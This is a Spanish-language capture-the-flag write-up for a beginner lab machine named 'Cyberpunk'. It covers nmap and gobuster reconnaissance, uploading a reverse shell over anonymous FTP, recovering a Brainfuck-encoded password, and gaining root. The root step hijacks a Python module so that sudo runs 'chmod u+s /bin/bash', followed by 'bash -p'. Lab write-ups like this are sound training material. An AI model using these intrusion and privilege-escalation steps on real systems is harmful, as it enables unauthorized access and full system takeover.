Cyberpunk

🔍 Dificultad: Principiante

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.78

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -sVC -p- -n --min-rate 5000 192.168.1.78

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 21 perteneciente al servicio FTP, el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p21,22,80 -v 192.168.1.78

para obtener más información sobre ese puerto específicamente.

Seguimos indagando más sobre los puertos y ahora exploramos el servicio HTTP. Ingresamos la IP y nos encontramos la página con una imagen de una chica hacker.

Ahora buscaremos directorios con la herramienta Gobuster a través de:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://192.168.1.78

Encontramos un archivo interesante llamado secret.txt.

Voy a indagar al servicio FTP a través del usuario anonymous ya que hemos visto que tenemos acceso.

🚀 EXPLOTACIÓN

Al descargar estos archivos nos damos cuenta que es el mismo contenido que la página web por lo que subiremos una revshell. Nos ponemos en escucha, establecemos la conexión y revisamos que ya hemos establecido la conexión.

Tras ponerme en escucha y realizar tratamiento de la TTY. Como se nos muestra aquí: Tratamiento de la TTY. Listamos el contenido de varios directorios y encontramos un archivo en el directorio /opt.

Es un código Brainfuck así que vamos a desencriptar.

Hemos descubierto la contraseña del usuario arasaka. Sabiendo esto, nos conectamos a través de SSH al usuario con el comando:

ssh arasaka@192.168.1.78

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Listamos permisos ocultos con ls -la.

Como observamos que el archivo utiliza la biblioteca base64 de manera relativa, procederemos a crear un archivo llamado base64.py . Luego, le otorgaremos permisos de ejecución para que podamos aprovecharlo cuando se ejecute con privilegios de sudo.

import os;
os.system("chmod u+s /bin/bash")

Ejecutamos el script con permisos de root.

sudo -u root /usr/bin/python3.11 /home/arasaka/randombase64.py

Vemos los permisos y ejecutamos los siguientes comandos:

ls -la /bin/bash
bash -p

Ya somos root.

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀

Last updated

Was this helpful?